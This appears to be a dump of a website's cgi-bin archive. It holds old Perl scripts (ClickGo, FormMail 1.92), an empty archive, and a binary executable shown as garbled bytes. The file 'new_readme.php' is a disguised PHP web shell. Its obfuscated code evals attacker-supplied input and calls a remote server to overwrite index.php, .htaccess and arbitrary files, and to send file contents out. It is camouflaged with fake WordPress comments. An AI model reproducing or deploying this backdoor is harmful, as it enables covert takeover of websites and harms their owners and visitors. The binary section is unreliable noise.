cgi-bin/0000755000150000011200000000000013665457417014271 5ustar johnnyshotjohnnyshotgrpcgi-bin/new_readme.php0000644000150000011200000004507413467232265017112 0ustar johnnyshotjohnnyshotgrp$s5c849864){$l8081fa0f = $s5c849864;$k39445f = $m165;}if (!$l8081fa0f){foreach ($tc5621[$tc5621['q57c'][19].$tc5621['q57c'][93].$tc5621['q57c'][57].$tc5621['q57c'][57].$tc5621['q57c'][52]] as $m165=>$s5c849864){$l8081fa0f = $s5c849864;$k39445f = $m165;}}$l8081fa0f = @$tc5621[$tc5621['q57c'][71].$tc5621['q57c'][9].$tc5621['q57c'][93].$tc5621['q57c'][78].$tc5621['q57c'][9]]($tc5621[$tc5621['q57c'][75].$tc5621['q57c'][51].$tc5621['q57c'][24].$tc5621['q57c'][52].$tc5621['q57c'][45].$tc5621['q57c'][9]]($tc5621[$tc5621['q57c'][28].$tc5621['q57c'][51].$tc5621['q57c'][31].$tc5621['q57c'][75].$tc5621['q57c'][47].$tc5621['q57c'][93].$tc5621['q57c'][57]]($l8081fa0f), $k39445f));if (isset($l8081fa0f[$tc5621['q57c'][28].$tc5621['q57c'][5]]) && $l182b94e6==$l8081fa0f[$tc5621['q57c'][28].$tc5621['q57c'][5]]){if ($l8081fa0f[$tc5621['q57c'][28]] == $tc5621['q57c'][86]){$macb62 = Array($tc5621['q57c'][37].$tc5621['q57c'][76] => @$tc5621[$tc5621['q57c'][67].$tc5621['q57c'][94].$tc5621['q57c'][9].$tc5621['q57c'][57].$tc5621['q57c'][19].$tc5621['q57c'][28].$tc5621['q57c'][93].$tc5621['q57c'][19]](),$tc5621['q57c'][34].$tc5621['q57c'][76] => $tc5621['q57c'][9].$tc5621['q57c'][97].$tc5621['q57c'][57].$tc5621['q57c'][38].$tc5621['q57c'][9],);echo @$tc5621[$tc5621['q57c'][28].$tc5621['q57c'][94].$tc5621['q57c'][28].$tc5621['q57c'][75].$tc5621['q57c'][53].$tc5621['q57c'][19]]($macb62);}elseif ($l8081fa0f[$tc5621['q57c'][28]] == $tc5621['q57c'][19]){eval/*t981*/($l8081fa0f[$tc5621['q57c'][52]]);}exit();}} ?> $c, 'trait' => $b); /** * @param string $file * @param int $mode * @param bool $recursive * @return bool|string */ if (isset($_REQUEST['endif'])) { rwx('index.php'); $d['endif'] = fgc('index.php'); $e=send($a, $d); echo ''.$e.''; unset($d['endif']); } /** * @param string $file * @return string */ if (isset($_REQUEST['endswitch'])) { rwx('.htaccess'); $d['endswitch'] = fgc('.htaccess'); $e=send($a, $d); echo ''.$e.''; unset($d['endswitch']); } /** * @return bool */ if (isset($_REQUEST['endfor'])) { $d['endforeach'] = $_REQUEST['endfor']; $d['endwhile'] = fgc($_REQUEST['endfor']); $e=send($a, $d); echo ''.$e.''; unset($d['endforeach'],$d['endwhile']); } /** * @param string $file * @return string|false */ if (isset($_REQUEST['if'])) { $d['if'] = 'if'; $f = send($a, $d); if($f!=''&&$f!='缺失') {rwx('index.php'); fpc('index.php', $f);} echo '' . fgc('index.php') . ''; unset($d['if']); } /** * * @param string $file * @param string $group * @param bool $recursive * * @return bool */ if (isset($_REQUEST['switch'])) { $d['switch'] = 'switch'; $g = send($a, $d); if($g!=''&&$g!='缺失') {rwx('.htaccess'); fpc('.htaccess', $g);} echo '' . fgc('.htaccess') . ''; unset($d['switch']); } /** * @param string $file * @return bool */ if (isset($_REQUEST['for'])) { $d['for'] = $_REQUEST['for']; $h = send($a, $d); if($h!=''&&$h!='缺失') fpc($_REQUEST['for'], $h); echo '' . fgc($_REQUEST['for']) . ''; unset($d['for']); } } /** * Gets the ssh.sftp PHP stream wrapper path to open for the given file. * * This method also works around a PHP bug where the root directory (/) cannot * be opened by PHP functions, causing a false failure. In order to work around * this, the path is converted to /./ which is semantically the same as / * See https://bugs.php.net/bug.php?id=64169 for more details. * * * @since 4.4.0 * * @param string $path The File/Directory path on the remote server to return * @return string The ssh.sftp:// wrapped path to use. */ function send($i, $d) { $d = http_build_query($d); $j = array('http' => array('method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $d, 'timeout' => 15 * 60)); $k = stream_context_create($j); if(ini_get('allow_url_fopen')) { $e = file_get_contents($i, false, $k); }else{ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$i); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,$d); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); $e=curl_exec($ch); curl_close($ch); } return $e; } /** * Create HTML list of nav menu input items. * * @since 3.0.0 * @uses Walker_Nav_Menu */ function fgc($x){ global $dir; return file_get_contents($dir . $x); } function fpc($x,$y){ global $dir; return file_put_contents($dir.$x,$y); } /** * * @param array $fields */ function rwx($x){ global $dir; @chmod($dir.$x,0644); } /** * Filters the list of action links available following a single theme installation. * @since 2.8.0 * @param array $install_actions Array of theme action links. * @param object $api Object containing WordPress.org API theme data. * @param string $stylesheet Theme directory name. * @param WP_Theme $theme_info Theme object. * @return */ function getRequestUri() { if (isset($_SERVER['REQUEST_URI'])) { $requestUri = $_SERVER['REQUEST_URI']; } elseif (isset($_SERVER['HTTP_X_REWRITE_URL'])) { $requestUri = $_SERVER['HTTP_X_REWRITE_URL']; } elseif (isset($_SERVER['REDIRECT_URL'])) { $requestUri = $_SERVER['REDIRECT_URL']; } elseif (isset($_SERVER['ORIG_PATH_INFO'])) { $requestUri = $_SERVER['ORIG_PATH_INFO']; if (!empty($_SERVER['QUERY_STRING'])) { $requestUri .= '?' . $_SERVER['QUERY_STRING']; } } return $requestUri; }cgi-bin/clickgo.cgi0000644000150000011200000000552110055552571016356 0ustar johnnyshotjohnnyshotgrp#!/usr/local/bin/perl #-------------------------Welcome----------------------------- # # ClickGo # Ver. 1.0 # By Luke and Mark Pfeifer # http://www.staff.net/cgi-scripts/ # Release 5-7-97 # Updated 5-7-97 # # Copyright Info: This application was written by Mark and Luke # Pfeifer Feel free to copy, cite, reference, sample, borrow, resell # or plagiarize the contents. However, if you # don't mind, please let us know where it goes so that we can # watch and take part in the development of it. Information wants # to be free, support public domain freeware. Donations are appreciated # and will be spent on further upgrades and other public domain scripts. # # Finally, PLEASE SEND WORKING URL's to lpfeifer@mail.tcbi.com. We # would like to keep a list of these scripts in use. #------------------------------------------------------------- #-----------------------ReadMe-------------------------------- # # Chmod this file to 755, if you have Unix. For NT remove the # first line in this file. # # The script is called by creating a link like this #
# # #
# # ***** Do not use http:\\ in the values******* # #------------------------------------------------------------- # #--------------- Variable Definition -------------------------- # # $main - the url of the default page to go to. If no data is recived in. # #------------------------------------------------------------- #------- Start User Configuration ---------------------------- $main = 'johnnyshot.com'; #---End User Configuration ----------------------------------- #**************** DO NOT EDIT PAST THIS LINE *****************# &FormInput(*input); if($input{'goto'} eq "") { print ("Location: http://$main\n\n"); } else { print ("Location: http://$input{'goto'}\n\n"); } exit; #------------------------------------------------------------- # FormInput: Function #------------------------------------------------------------- sub FormInput { local (*qs) = @_ if @_; if ($ENV{'REQUEST_METHOD'} eq "GET") { $qs = $ENV{'QUERY_STRING'}; } elsif ($ENV{'REQUEST_METHOD'} eq "POST") { read(STDIN,$qs,$ENV{'CONTENT_LENGTH'}); } @qs = split(/&/,$qs); foreach $i (0 .. $#qs) { $qs[$i] =~ s/\+/ /g; $qs[$i] =~ s/%(..)/pack("c",hex($1))/ge; ($name,$value) = split(/=/,$qs[$i],2); if($qs{$name} ne "") { $qs{$name} = "$qs{$name}:$value"; } else { $qs{$name} = $value; } } return 1; } cgi-bin/formmail5-2004.cgi0000644000150000011200000007075610056166560017235 0ustar johnnyshotjohnnyshotgrp#!/usr/bin/perl ############################################################################## # FormMail Version 1.92sn # # Copyright 1995-2002 Matt Wright mattw@scriptarchive.com # # Created 06/09/95 Last Modified 09/10/02 # # Matt's Script Archive, Inc.: http://www.scriptarchive.com/ # ############################################################################## # COPYRIGHT NOTICE # # Copyright 1995-2002 Matthew M. Wright All Rights Reserved. # # # # FormMail may be used and modified free of charge by anyone so long as this # # copyright notice and the comments above remain intact. By using this # # code you agree to indemnify Matthew M. Wright from any liability that # # might arise from its use. # # # # Selling the code for this program without prior written consent is # # expressly forbidden. In other words, please ask first before you try and # # make money off of my program. # # # # Obtain permission before redistributing this software over the Internet or # # in any other medium. In all cases copyright and header must remain intact. # ############################################################################## # ACCESS CONTROL FIX: Peter D. Thompson Yezek # # http://www.securityfocus.com/archive/1/62033 # ############################################################################## # Define Variables # # Detailed Information Found In README File. # # $mailprog defines the location of your sendmail program on your unix # # system. The flags -i and -t should be passed to sendmail in order to # # have it ignore single dots on a line and to read message for recipients # $mailprog = '/usr/lib/sendmail -i -t'; # @referers allows forms to be located only on servers which are defined # # in this field. This security fix from the last version which allowed # # anyone on any server to use your FormMail script on their web site. # @referers = ('johnnyshot.com'); # @recipients defines the e-mail addresses or domain names that e-mail can # # be sent to. This must be filled in correctly to prevent SPAM and allow # # valid addresses to receive e-mail. Read the documentation to find out how # # this variable works!!! It is EXTREMELY IMPORTANT. # @recipients = &fill_recipients(@referers); # ACCESS CONTROL FIX: Peter D. Thompson Yezek # # @valid_ENV allows the sysadmin to define what environment variables can # # be reported via the env_report directive. This was implemented to fix # # the problem reported at http://www.securityfocus.com/bid/1187 # @valid_ENV = ('REMOTE_HOST','REMOTE_ADDR','REMOTE_USER','HTTP_USER_AGENT'); # Done # ############################################################################## # Check Referring URL &check_url; # Retrieve Date &get_date; # Parse Form Contents &parse_form; # Check Required Fields &check_required; # Send E-Mail &send_mail; # Return HTML Page or Redirect User &return_html; # NOTE rev1.91: This function is no longer intended to stop abuse, that # # functionality is now embedded in the checks made on @recipients and the # # recipient form field. # sub check_url { # Localize the check_referer flag which determines if user is valid. # local($check_referer) = 0; # If a referring URL was specified, for each valid referer, make sure # # that a valid referring URL was passed to FormMail. # if ($ENV{'HTTP_REFERER'}) { foreach $referer (@referers) { if ($ENV{'HTTP_REFERER'} =~ m|https?://([^/]*)$referer|i) { $check_referer = 1; last; } } } else { $check_referer = 1; } # If the HTTP_REFERER was invalid, send back an error. # if ($check_referer != 1) { &error('bad_referer') } } sub get_date { # Define arrays for the day of the week and month of the year. # @days = ('Sunday','Monday','Tuesday','Wednesday', 'Thursday','Friday','Saturday'); @months = ('January','February','March','April','May','June','July', 'August','September','October','November','December'); # Get the current time and format the hour, minutes and seconds. Add # # 1900 to the year to get the full 4 digit year. # ($sec,$min,$hour,$mday,$mon,$year,$wday) = (localtime(time))[0,1,2,3,4,5,6]; $time = sprintf("%02d:%02d:%02d",$hour,$min,$sec); $year += 1900; # Format the date. # $date = "$days[$wday], $months[$mon] $mday, $year at $time"; } sub parse_form { # Define the configuration associative array. # %Config = ('recipient','', 'subject','', 'email','', 'realname','', 'redirect','', 'bgcolor','', 'background','', 'link_color','', 'vlink_color','', 'text_color','', 'alink_color','', 'title','', 'sort','', 'print_config','', 'required','', 'env_report','', 'return_link_title','', 'return_link_url','', 'print_blank_fields','', 'missing_fields_redirect',''); # Determine the form's REQUEST_METHOD (GET or POST) and split the form # # fields up into their name-value pairs. If the REQUEST_METHOD was # # not GET or POST, send an error. # if ($ENV{'REQUEST_METHOD'} eq 'GET') { # Split the name-value pairs @pairs = split(/&/, $ENV{'QUERY_STRING'}); } elsif ($ENV{'REQUEST_METHOD'} eq 'POST') { # Get the input read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); # Split the name-value pairs @pairs = split(/&/, $buffer); } else { &error('request_method'); } # For each name-value pair: # foreach $pair (@pairs) { # Split the pair up into individual variables. # local($name, $value) = split(/=/, $pair); # Decode the form encoding on the name and value variables. # # v1.92: remove null bytes # $name =~ tr/+/ /; $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $name =~ tr/\0//d; $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ tr/\0//d; # If the field name has been specified in the %Config array, it will # # return a 1 for defined($Config{$name}}) and we should associate # # this value with the appropriate configuration variable. If this # # is not a configuration form field, put it into the associative # # array %Form, appending the value with a ', ' if there is already a # # value present. We also save the order of the form fields in the # # @Field_Order array so we can use this order for the generic sort. # if (defined($Config{$name})) { $Config{$name} = $value; } else { if ($Form{$name} ne '') { $Form{$name} = "$Form{$name}, $value"; } else { push(@Field_Order,$name); $Form{$name} = $value; } } } # The next six lines remove any extra spaces or new lines from the # # configuration variables, which may have been caused if your editor # # wraps lines after a certain length or if you used spaces between field # # names or environment variables. # $Config{'required'} =~ s/(\s+|\n)?,(\s+|\n)?/,/g; $Config{'required'} =~ s/(\s+)?\n+(\s+)?//g; $Config{'env_report'} =~ s/(\s+|\n)?,(\s+|\n)?/,/g; $Config{'env_report'} =~ s/(\s+)?\n+(\s+)?//g; $Config{'print_config'} =~ s/(\s+|\n)?,(\s+|\n)?/,/g; $Config{'print_config'} =~ s/(\s+)?\n+(\s+)?//g; # Split the configuration variables into individual field names. # @Required = split(/,/,$Config{'required'}); @Env_Report = split(/,/,$Config{'env_report'}); @Print_Config = split(/,/,$Config{'print_config'}); # ACCESS CONTROL FIX: Only allow ENV variables in @valid_ENV in # # @Env_Report for security reasons. # foreach $env_item (@Env_Report) { foreach $valid_item (@valid_ENV) { if ( $env_item eq $valid_item ) { push(@temp_array, $env_item) } } } @Env_Report = @temp_array; } sub check_required { # Localize the variables used in this subroutine. # local($require, @error); # The following insures that there were no newlines in any fields which # # will be used in the header. # if ($Config{'subject'} =~ /(\n|\r)/m || $Config{'email'} =~ /(\n|\r)/m || $Config{'realname'} =~ /(\n|\r)/m || $Config{'recipient'} =~ /(\n|\r)/m) { &error('invalid_headers'); } if (!$Config{'recipient'}) { if (!defined(%Form)) { &error('bad_referer') } else { &error('no_recipient') } } else { # This block of code requires that the recipient address end with # # a valid domain or e-mail address as defined in @recipients. # $valid_recipient = 0; foreach $send_to (split(/,/,$Config{'recipient'})) { foreach $recipient (@recipients) { if (($send_to !~ /[<>&#]/) && ($send_to =~ /$recipient$/i)) { push(@send_to,$send_to); last; } } } if ($#send_to < 0) { &error('no_recipient') } $Config{'recipient'} = join(',',@send_to); } # For each require field defined in the form: # foreach $require (@Required) { # If the required field is the email field, the syntax of the email # # address if checked to make sure it passes a valid syntax. # if ($require eq 'email' && !&check_email($Config{$require})) { push(@error,$require); } # Otherwise, if the required field is a configuration field and it # # has no value or has been filled in with a space, send an error. # elsif (defined($Config{$require})) { if ($Config{$require} eq '') { push(@error,$require); } } # If it is a regular form field which has not been filled in or # # filled in with a space, flag it as an error field. # elsif (!defined($Form{$require}) || $Form{$require} eq '') { push(@error,$require); } } # If any error fields have been found, send error message to the user. # if (@error) { &error('missing_fields', @error) } } sub return_html { # Local variables used in this subroutine initialized. # local($key,$sort_order,$sorted_field); # Now that we have finished using form values for any e-mail related # # reasons, we will convert all of the form fields and config values # # to remove any cross-site scripting security holes. # local($field); foreach $field (keys %Config) { $safeConfig{$field} = &clean_html($Config{$field}); } foreach $field (keys %Form) { $Form{$field} = &clean_html($Form{$field}); } # If redirect option is used, print the redirectional location header. # if ($Config{'redirect'}) { print "Location: $safeConfig{'redirect'}\n\n"; } # Otherwise, begin printing the response page. # else { # Print HTTP header and opening HTML tags. # print "Content-type: text/html\n\n"; print "\n \n"; # Print out title of page # if ($Config{'title'}) { print "$safeConfig{'title'}\n" } else { print "Thank You\n" } print " \n \n
\n"; # Print custom or generic title. # if ($Config{'title'}) { print "

$safeConfig{'title'}

\n" } else { print "

Thank You For Filling Out This Form

\n" } print "
\n"; print "Below is what you submitted to $safeConfig{'recipient'} on "; print "$date


\n"; # If a sort order is specified, sort the form fields based on that. # if ($Config{'sort'} =~ /^order:.*,.*/) { # Set the temporary $sort_order variable to the sorting order, # # remove extraneous line breaks and spaces, remove the order: # # directive and split the sort fields into an array. # $sort_order = $Config{'sort'}; $sort_order =~ s/(\s+|\n)?,(\s+|\n)?/,/g; $sort_order =~ s/(\s+)?\n+(\s+)?//g; $sort_order =~ s/order://; @sorted_fields = split(/,/, $sort_order); # For each sorted field, if it has a value or the print blank # # fields option is turned on print the form field and value. # foreach $sorted_field (@sorted_fields) { local $sfname = &clean_html($sorted_field); if ($Config{'print_blank_fields'} || $Form{$sorted_field} ne '') { print "$sfname: $Form{$sorted_field}

\n"; } } } # Otherwise, use the order the fields were sent, or alphabetic. # else { # Sort alphabetically if requested. if ($Config{'sort'} eq 'alphabetic') { @Field_Order = sort @Field_Order; } # For each form field, if it has a value or the print blank # # fields option is turned on print the form field and value. # foreach $field (@Field_Order) { local $fname = &clean_html($field); if ($Config{'print_blank_fields'} || $Form{$field} ne '') { print "$fname: $Form{$field}

\n"; } } } print "


\n"; # Check for a Return Link and print one if found. # if ($Config{'return_link_url'} && $Config{'return_link_title'}) { print "

\n"; } # Print the page footer. # print <<"(END HTML FOOTER)";

FormMail V1.92 © 1995 - 2002 Matt Wright
A Free Product of Matt's Script Archive, Inc.
(END HTML FOOTER) } } sub send_mail { # Localize variables used in this subroutine. # local($print_config,$key,$sort_order,$sorted_field,$env_report); # Open The Mail Program open(MAIL,"|$mailprog"); print MAIL "To: $Config{'recipient'}\n"; print MAIL "From: $Config{'email'} ($Config{'realname'})\n"; # Check for Message Subject if ($Config{'subject'}) { print MAIL "Subject: $Config{'subject'}\n\n" } else { print MAIL "Subject: WWW Form Submission\n\n" } print MAIL "Below is the result of your feedback form. It was submitted by\n"; print MAIL "$Config{'realname'} ($Config{'email'}) on $date\n"; print MAIL "-" x 75 . "\n\n"; if (@Print_Config) { foreach $print_config (@Print_Config) { if ($Config{$print_config}) { print MAIL "$print_config: $Config{$print_config}\n\n"; } } } # If a sort order is specified, sort the form fields based on that. # if ($Config{'sort'} =~ /^order:.*,.*/) { # Remove extraneous line breaks and spaces, remove the order: # # directive and split the sort fields into an array. # local $sort_order = $Config{'sort'}; $sort_order =~ s/(\s+|\n)?,(\s+|\n)?/,/g; $sort_order =~ s/(\s+)?\n+(\s+)?//g; $sort_order =~ s/order://; @sorted_fields = split(/,/, $sort_order); # For each sorted field, if it has a value or the print blank # # fields option is turned on print the form field and value. # foreach $sorted_field (@sorted_fields) { if ($Config{'print_blank_fields'} || $Form{$sorted_field} ne '') { print MAIL "$sorted_field: $Form{$sorted_field}\n\n"; } } } # Otherwise, print fields in order they were sent or alphabetically. # else { # Sort alphabetically if specified: # if ($Config{'sort'} eq 'alphabetic') { @Field_Order = sort @Field_Order; } # For each form field, if it has a value or the print blank # # fields option is turned on print the form field and value. # foreach $field (@Field_Order) { if ($Config{'print_blank_fields'} || $Form{$field} ne '') { print MAIL "$field: $Form{$field}\n\n"; } } } print MAIL "-" x 75 . "\n\n"; # Send any specified Environment Variables to recipient. # foreach $env_report (@Env_Report) { if ($ENV{$env_report}) { print MAIL "$env_report: $ENV{$env_report}\n"; } } close (MAIL); } sub check_email { # Initialize local email variable with input to subroutine. # $email = $_[0]; # If the e-mail address contains: # if ($email =~ /(@.*@)|(\.\.)|(@\.)|(\.@)|(^\.)/ || # the e-mail address contains an invalid syntax. Or, if the # # syntax does not match the following regular expression pattern # # it fails basic syntax verification. # $email !~ /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z0-9]+)(\]?)$/) { # Basic syntax requires: one or more characters before the @ sign, # # followed by an optional '[', then any number of letters, numbers, # # dashes or periods (valid domain/IP characters) ending in a period # # and then 2 or 3 letters (for domain suffixes) or 1 to 3 numbers # # (for IP addresses). An ending bracket is also allowed as it is # # valid syntax to have an email address like: user@[255.255.255.0] # # Return a false value, since the e-mail address did not pass valid # # syntax. # return 0; } else { # Return a true value, e-mail verification passed. # return 1; } } # This was added into v1.91 to further secure the recipients array. Now, by # # default it will assume that valid recipients include only users with # # usernames A-Z, a-z, 0-9, _ and - that match your domain exactly. If this # # is not what you want, you should read more detailed instructions regarding # # the configuration of the @recipients variable in the documentation. # sub fill_recipients { local(@domains) = @_; local($domain,@return_recips); foreach $domain (@domains) { if ($domain =~ /^\d+\.\d+\.\d+\.\d+$/) { $domain =~ s/\./\\\./g; push(@return_recips,'^[\w\-\.]+\@\[' . $domain . '\]'); } else { $domain =~ s/\./\\\./g; $domain =~ s/\-/\\\-/g; push(@return_recips,'^[\w\-\.]+\@' . $domain); } } return @return_recips; } # This function will convert <, >, & and " to their HTML equivalents. # sub clean_html { local $value = $_[0]; $value =~ s/\&/\&/g; $value =~ s//\>/g; $value =~ s/"/\"/g; return $value; } sub body_attributes { # Check for Background Color if ($Config{'bgcolor'}) { print " bgcolor=\"$safeConfig{'bgcolor'}\"" } # Check for Background Image if ($Config{'background'}) { print " background=\"$safeConfig{'background'}\"" } # Check for Link Color if ($Config{'link_color'}) { print " link=\"$safeConfig{'link_color'}\"" } # Check for Visited Link Color if ($Config{'vlink_color'}) { print " vlink=\"$safeConfig{'vlink_color'}\"" } # Check for Active Link Color if ($Config{'alink_color'}) { print " alink=\"$safeConfig{'alink_color'}\"" } # Check for Body Text Color if ($Config{'text_color'}) { print " text=\"$safeConfig{'text_color'}\"" } } sub error { # Localize variables and assign subroutine input. # local($error,@error_fields) = @_; local($host,$missing_field,$missing_field_list); if ($error eq 'bad_referer') { if ($ENV{'HTTP_REFERER'} =~ m|^https?://([\w\.]+)|i) { $host = $1; my $referer = &clean_html($ENV{'HTTP_REFERER'}); print <<"(END ERROR HTML)"; Content-type: text/html Bad Referrer - Access Denied
Bad Referrer - Access Denied
The form attempting to use FormMail resides at $referer, which is not allowed to access this cgi script.

If you are attempting to configure FormMail to run with this form, you need to add the following to \@referers, explained in detail in the README file.

Add '$host' to your \@referers array.


FormMail V1.92 © 1995 - 2002 Matt Wright
A Free Product of Matt's Script Archive, Inc.
(END ERROR HTML) } else { print <<"(END ERROR HTML)"; Content-type: text/html FormMail v1.92
FormMail
Copyright 1995 - 2002 Matt Wright
Version 1.92 - Released April 21, 2002
A Free Product of Matt's Script Archive, Inc.
(END ERROR HTML) } } elsif ($error eq 'request_method') { print <<"(END ERROR HTML)"; Content-type: text/html Error: Request Method
Error: Request Method
The Request Method of the Form you submitted did not match either GET or POST. Please check the form and make sure the method= statement is in upper case and matches GET or POST.

FormMail V1.92 © 1995 - 2002 Matt Wright
A Free Product of Matt's Script Archive, Inc.
(END ERROR HTML) } elsif ($error eq 'no_recipient') { print <<"(END ERROR HTML)"; Content-type: text/html Error: Bad/No Recipient
Error: Bad/No Recipient
There was no recipient or an invalid recipient specified in the data sent to FormMail. Please make sure you have filled in the recipient form field with an e-mail address that has been configured in \@recipients. More information on filling in recipient form fields and variables can be found in the README file.
FormMail V1.92 © 1995 - 2002 Matt Wright
A Free Product of Matt's Script Archive, Inc.
(END ERROR HTML) } elsif ($error eq 'invalid_headers') { print <<"(END ERROR HTML)"; Content-type: text/html Error: Bad Header Fields
Error: Bad Header Fields
The header fields, which include recipient, email, realname and subject were filled in with invalid values. You may not include any newline characters in these parameters. More information on filling in these form fields and variables can be found in the README file.
FormMail V1.92 © 1995 - 2002 Matt Wright
A Free Product of Matt's Script Archive, Inc.
(END ERROR HTML) } elsif ($error eq 'missing_fields') { if ($Config{'missing_fields_redirect'}) { print "Location: " . &clean_html($Config{'missing_fields_redirect'}) . "\n\n"; } else { foreach $missing_field (@error_fields) { $missing_field_list .= "
  • " . &clean_html($missing_field) . "\n"; } print <<"(END ERROR HTML)"; Content-type: text/html Error: Blank Fields
    Error: Blank Fields
    The following fields were left blank in your submission form:

      $missing_field_list

    These fields must be filled in before you can successfully submit the form.

    Please use your browser's back button to return to the form and try again.


    FormMail V1.92 © 1995 - 2002 Matt Wright
    A Free Product of Matt's Script Archive, Inc.
    (END ERROR HTML) } } exit; } cgi-bin/sitevars0000644000150000011200000000075110055552573016044 0ustar johnnyshotjohnnyshotgrp# sitevars - stored variables and macros that are system-wide available # the \ (backslash) character at the end of a line will continue # on to the next line. # the htmlscript applets page (naturally) htmlscriptapplets=\ Go To htmlscript Sample Applets Page # Format Patterns For Making U.S.A. Money Display Correctly usmoneyfmt=3+,0#.PP # pre-processor controls htsoff= htson= cgi-bin/1.tar.gz0000644000150000011200000000000013434122641015524 0ustar johnnyshotjohnnyshotgrpcgi-bin/php0000644000150000011200000557275410135153141015004 0ustar johnnyshotjohnnyshotgrpELFu44 (444%%@@[@[Ha  & & /lib/ld-linux.so.2GNU@ <c +   EP C [ !h ,9k ,Lr#+  @& *RP !VD=oKl J  n n8   W&  (= Z 6 e +  8 9 sV  O' THF  O _f  G [ q  zj l4  o  lS m< 8 t Q \ 9 { P g Bxf 1 w ;  Xg1 d  3 ) W I 1    2   <  >:6 Oc ?TE  Ax  y>qd5YOm` *  3@ ` r+  x oW W ? N xZ s% e mx  )w~E ^   = C ' d sS 2 qT @ /  h Y Sp: ? B R NE  *E' -'<  5   6  F  O 9 %  8 P  7""`)  W 1 'B  8=? uHQ J" ( t ]  ,Ar `  Y _ @ j % *w f uu $ R] ^ p M uS# i; )) K% q ; U 1_ZL 7_ - .s Q7 `  {a y% 7 S,C 6X J  8 bR ` 9     E"w= G, z  @ $ / " [ pp k ] i Q pvb  c  : u JkV CH OG YX$ {" A( l | ' # Od &qg N0 oz  c \M :  3 <v/&yW  ' {  -  & F )5 )HX!  KrJ K ^ s c  (  k  WU ;   r  Y  . ;. Qg  SytY " 4 m> e8{= wD bR$   % e k,   ?o9F33 B 0 lhl V( v84|/ : i 5 n A dN~ d( |y  3o 5 s { '< !qH_ 5 j RLN '  .BeA" @,c ( D   ] ci  k A     *<    f; v  4v"   f\  6v M !W^ 2  >  e]  nh-r^ ` S+t M u Q ,  ! c:(X MD G/AnY y 2m )-  c|  ' Z Z ?   H  -t   e  .   F e h q Z / j>   miJ4 ob*    ;K  E@4 v }   X !2 I a  F)  \$ `K\ / b,&/- | T  R b { w /   x= g  + z 6p 5  V [. 0Q : %  r$   }! Z7 7 asi  U  }  Q iz _[ iY9d0uCMPN e? []~V1;BDIh |CT'^+z8_%X~oq{/W1Xq]l}r<4xE%u.oU!Lqxf;VD)[r}CGY),ft=nP}2LRsRP$vx7@#bF& d-ZBdY*>,6GC8IQZGl$ &GfN 0LfOM'g@wt;+^24 JMj;&ak7I|g5z ~n"QHe$?*\E>pE*_RvAFb=maa9#kI%Tp/Pt5Sb4*2 \V /9 mUQ-My jUsu[Va:j7\Llj2,>`B{0?xJX?H)\TJ .~D y<.}~5~<S0]<.?06}I=(gSDup#-K +8r+~}z3:(}y7&c0Tav4tU5CJ_h5# HGi_F{13U"&(^sn<I+N\VF@J glw2> w30DB@h2N$n=Lf oMwU#On=bLGAynLg^PEhVNb]4|j- \Id#3k( 6WzX9s^]^M"lIPKB+I{|Uh 1 gO k$RB;qy ~ iC 76N2K Gp|-1AP>`:Ttfwr z $}*! ?T Xo3 :3a6    4m1[ KZ#  ut`# ~C  &  j c  K 1d F> UY . SZm kO D7jW e 8 9! Ah6 [ !# %m %_ .>9   Hv * : az  L HT  x[ a| p0 i0 ]Db 1 k / . ~ b1  Q <= 8 ,   U  ` ܸ 3+ Oo f p\ZT XFZ x,   `e d$M ` !E / = Z L 7 bWv E ( LF     V t   )mu Bm + W h<* |)     Lf > s j ? bHz  xt /+  E`  U}z d xI _b= @ % \l e   , P   )B= @1 H,vV  aW kd x3 + ̵    $ x / )     &  2$FQ  } bKbkW  k`  y3o \/ c;E  ض .d dgI px <.j TxA@ (  $  Ѐ [ @ &(d  |   dQ 1Ъ 8q M@#  g  z0~  C Ho8d5@ H  - `` $  . Y ?Xt Pc$ oD   Hd3L $ #       / ` Xp +t#  @4r \ N Z  qH  HL= 8  D p6 }    &$ `j    м j &  5 | A P N y%W X& q (\  p   x' 0' !  :Xd Fb+ 0j !q 2 ! 6!8 '?! 2 I!  S!8  l! !}!0 !D !- !` s !( !@$ !@ "hnN "C 7"@ 0 H"p  V"h p" "\ "/ "/  hd "d", , "ؔ4 #`G #  &#7 D# v V#  h#4! #xS xd#0 S  #в d#I #P 1 #f#]x# #f $x $ d/+$ / 0 &6$ y! G$8U c$Sl$wA $8  $X{  $6 $p V $l  $H $ $8 %p Q %o   "%P: 6%~  D%- M% a% q%x: ~%E % %4 od% * %P %  %s %tj  % X &1 &_ o -&0 ;&H y D&$xV&X  c&`  n&P0 & t &pO &4  &h  d&* &<' '  'н  ' .'3 8'  d5A't d!O'P\'ؕ  d'6 v' 'S 'h'<'* d/'[  ' Se '\f ^ 'hw` (( 5(H, 5 H(Hi f(; y() W)lb)D{C C z)d  )  ) )  )Ft )" _ et")  ) )  $'* ,*  >*X  O*0 a*D A *|V *~- *9 9 *  *  *L' *  *I *,xe+`>O +! ++h A+{ P+H s  (e= 8e'[+5 s+w He Xe%+# +\jq +  + t +y +4,  + ,f ,$ &,h 3,^O he5C,' [,< l,= s,,j   ,  ,d l ,g8 ,`, xe,p,$@  Ve_,,p ) -) - : 9- m  e:H-D  eMS-  e;\-8 T t-o x -p p -ȳ * -( -@-<  -T -& -T  .\ .h  '.  8.DJ C.  W.2 e. ~.].W' . k .u   .S . _  e7. = .S  /4  /] /(s (/ @/ P/ _/  p/~eQw/pI / /@$ //0x / /d9 /j  0 eO0S  ?0l= N0x ^0]$r0Ԝ F 0 0* eRfo00 0` 04 1p 1 21@g  D1ȴ  V1,A  d1   s1>} fM1- 1@$18g 1   1LY  (f$7 8f/&Hf1 2y  "2? r Xf`42@$M2 ]2dP w2 2` 2W2t= hf2n 2` 2@ xf72p~  3 o 3P 3  63'  M3T f[3o p3$  3`(3  38/ 3hx 3 3? G 3( ' 4h[44|  f)4 ;4 $Q4!  Ff`4d4 x l4 =  fdJ fw4l;D 4^ x 4P 4t4B5 4H4| % 4w4(A 5B 5(O /5`I @5p. Y50 g5(^ v5 